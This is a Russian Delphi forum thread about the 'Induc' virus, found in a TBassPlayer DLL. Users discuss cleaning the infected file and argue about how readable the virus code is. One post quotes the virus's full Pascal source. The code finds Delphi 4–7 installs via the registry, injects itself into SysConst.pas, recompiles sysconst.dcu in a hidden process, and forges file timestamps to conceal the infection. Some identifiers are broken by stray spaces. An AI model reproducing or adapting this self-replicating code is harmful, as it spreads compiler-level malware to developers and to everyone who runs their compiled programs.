Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 19.04.2010, 16:28   #191
mutabor
Телепат с дипломом
Старожил
 
Аватар для mutabor
 
Регистрация: 10.06.2007
Сообщений: 4,929
По умолчанию

Скачал последнюю версию TBassPlayer и там одна длл-ка заражена индюком этим, как раз время выпуска весна прошлого года, когда повально он у всех был. Если кому не трудно (если кто интересуется этим) полечите пожалуйста, а то я уже и забыл чем он там лечится, у меня Аваст стоит, он не лечит. Или скажите что конкретно удалить можно в хекс редакторе.
Спасибо.
http://tempfile.ru/file/1373444
The future is not a tablet with a 9" screen no more than the future was a 9" black & white screen in a box. It’s the paradigm that survives. (Kroc Camen)
Проверь себя! Онлайн тестирование | Мой блог

Последний раз редактировалось mutabor; 19.04.2010 в 16:31.
mutabor вне форума Ответить с цитированием
Старый 19.04.2010, 17:24   #192
Serge_Bliznykov
Старожил
 
Регистрация: 09.01.2008
Сообщений: 26,229
По умолчанию

mutabor

пробуйте - mbdrawer_cure.zip

p.s. лечил Касперычем...
Serge_Bliznykov вне форума Ответить с цитированием
Старый 19.04.2010, 19:27   #193
mutabor
Телепат с дипломом
Старожил
 
Аватар для mutabor
 
Регистрация: 10.06.2007
Сообщений: 4,929
По умолчанию

Сергей, спасибо, теперь нормально.
The future is not a tablet with a 9" screen no more than the future was a 9" black & white screen in a box. It’s the paradigm that survives. (Kroc Camen)
Проверь себя! Онлайн тестирование | Мой блог
mutabor вне форума Ответить с цитированием
Старый 10.05.2010, 03:25   #194
docbrain
Заблокирован
 
Регистрация: 14.01.2010
Сообщений: 306
По умолчанию

Простите, если не понял, но судя по комментариям, кто-то пишет новые версии этого вируса?
docbrain вне форума Ответить с цитированием
Старый 10.05.2010, 03:46   #195
docbrain
Заблокирован
 
Регистрация: 14.01.2010
Сообщений: 306
По умолчанию

Да, кстати. У вируса код какой-то смутный. Самый первый раздел, там просто мешанина из кода, то ли декомпилировали хреново, то ли еще что, но в разделе var просто ничего не разберешь.
docbrain вне форума Ответить с цитированием
Старый 10.05.2010, 09:16   #196
bitSoft
Programming...
Форумчанин
 
Аватар для bitSoft
 
Регистрация: 13.03.2010
Сообщений: 198
По умолчанию

Цитата:
Сообщение от docbrain Посмотреть сообщение
Да, кстати. У вируса код какой-то смутный. Самый первый раздел, там просто мешанина из кода, то ли декомпилировали хреново, то ли еще что, но в разделе var просто ничего не разберешь.
vidno shto ti Delphi ne znaeshi....
Cod ocheni krasivii...
i tam vapsheto pascalinie functii
Код:
With TProgrammersForum.Create do  AddNewTopic('Title','Content...');
bitSoft вне форума Ответить с цитированием
Старый 11.05.2010, 01:53   #197
docbrain
Заблокирован
 
Регистрация: 14.01.2010
Сообщений: 306
По умолчанию

Цитата:
vidno shto ti Delphi ne znaeshi....
Cod ocheni krasivii...
i tam vapsheto pascalinie functii
Боже, о чем это вы?
docbrain вне форума Ответить с цитированием
Старый 14.05.2010, 18:34   #198
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

вполне нормальный код.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 14.05.2010, 19:16   #199
bitSoft
Programming...
Форумчанин
 
Аватар для bitSoft
 
Регистрация: 13.03.2010
Сообщений: 198
По умолчанию

Цитата:
Сообщение от Пепел Феникса Посмотреть сообщение
вполне нормальный код.
ya toje samoe skazal brainu, no on ....
Код:
With TProgrammersForum.Create do  AddNewTopic('Title','Content...');
bitSoft вне форума Ответить с цитированием
Старый 15.05.2010, 06:00   #200
docbrain
Заблокирован
 
Регистрация: 14.01.2010
Сообщений: 306
По умолчанию

Цитата:
uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS _INFORMATION;b:boolean;t1,t2,t3:FIL ETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0 ,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+ }MoveFile(pchar(d+$dcu$),pchar(d+$b ak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.' ,
'wShowWindow:=SW_HIDE;b:=CreateProc ess(nil,pchar(e+$"$+d+$pas"$),0,0,f alse,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFI NITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d +$pas$));h:=CreateFile(pchar(d+$bak $),0,0,0,3,',
'0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0, 3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of',
'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software \Borland\Delphi\$+v+$.0$),0,KEY_REA D,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i, @c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\S ysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\ bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var i:integer;
begin
for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39;
result:=s;
end;

procedure re(s,d,e:string);
var f1,f2:textfile;
h:cardinal;
f:STARTUPINFO;
p:PROCESS_INFORMATION;
b:boolean;
t1,t2,t3:FILETIME;
begin
h:=CreateFile(pchar(d+'bak'),0,0,0, 3,0,0);
if h<>DWORD(-1) then
begin
CloseHandle(h);
exit;
end;
{'I-}assignfile(f1,s);
reset(f1);
if ioresult<>0 then exit;
assignfile(f2,d+'pas');
rewrite(f2);
if ioresult<>0 then begin closefile(f1); exit; end;

while not eof(f1) do
begin
readln(f1,s);
writeln(f2,s);
if pos('implementation',s)<>0 then break;
end;

for h:= 1 to 1 do writeln(f2,sc[h]);
for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');');
for h:= 2 to 24 do writeln(f2,x(sc[h]));
closefile(f1);
closefile(f2);
{'I+}MoveFile(pchar(d+'dcu'),pchar( d+'bak'));
fillchar(f,sizeof(f),0);
f.cb := sizeof(f);
f.dwFlags := STARTF_USESHOWWINDOW;
f.wShowWindow := SW_HIDE;
b := CreateProcess(nil,pchar(e+'"'+d+'pa s"'),0,0,false,0,0,0,f,p);
if b then WaitForSingleObject(p.hProcess,INFI NITE);
MoveFile(pchar(d+'bak'),pchar(d+'dc u'));
DeleteFile(pchar(d+'pas'));
h := CreateFile(pchar(d+'bak'),0,0,0,3,0 ,0);
if h=DWORD(-1) then exit;
GetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
h := CreateFile(pchar(d+'dcu'),256,0,0,3 ,0,0);
if h=DWORD(-1) then exit;
SetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
end;

procedure st;
var k:HKEY;c:array [1..255] of char;
i:cardinal;
r:string;
v:char;
begin
for v:='4' to '7' do
if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pch ar('Software\Borland\Delphi\'+v+'.0 '),0,KEY_READ,k)=0 then
begin
i:=255;
if RegQueryValueEx(k,'RootDir',nil,@i, @c,@i)=0 then
begin
r:='';
i:=1;
while c[i]<>#0 do
begin
r:=r+c[i];
inc(i);
end;
re(r+'\source\rtl\sys\SysConst'+'.p as',r+'\lib\sysconst.','"'+r+'\bin\ dcc32.exe" ');
end;
RegCloseKey(k);
end;
end;

begin
st;
end.
Тут не вполне понятно что именно происходит в разделе var. Также, код довольно сложен для восприятия новичками и в нем нет ни одного комментария.
P.S. bitSoft, одно из двух, либо пишите по русски кириллицей, либо по английски латиницей. Так как вы сейчас пишете, просто нечитабельно.
docbrain вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Реально ли написать на Delphi 7 свою библиотеку для Apache (PHP интерпр.) ? FLEX_NST PHP 1 05.07.2009 18:13
Проверьте правильность написания кода в delphi neomaximus Помощь студентам 2 09.04.2009 17:29
Please!!! Проверьте код по Delphi!!! Dmitriy-e-nest Помощь студентам 2 16.01.2009 15:41
Avast поднимает тревогу на создаваемые в delphi программы, пишет вирус Xemulb Софт 3 27.11.2008 21:37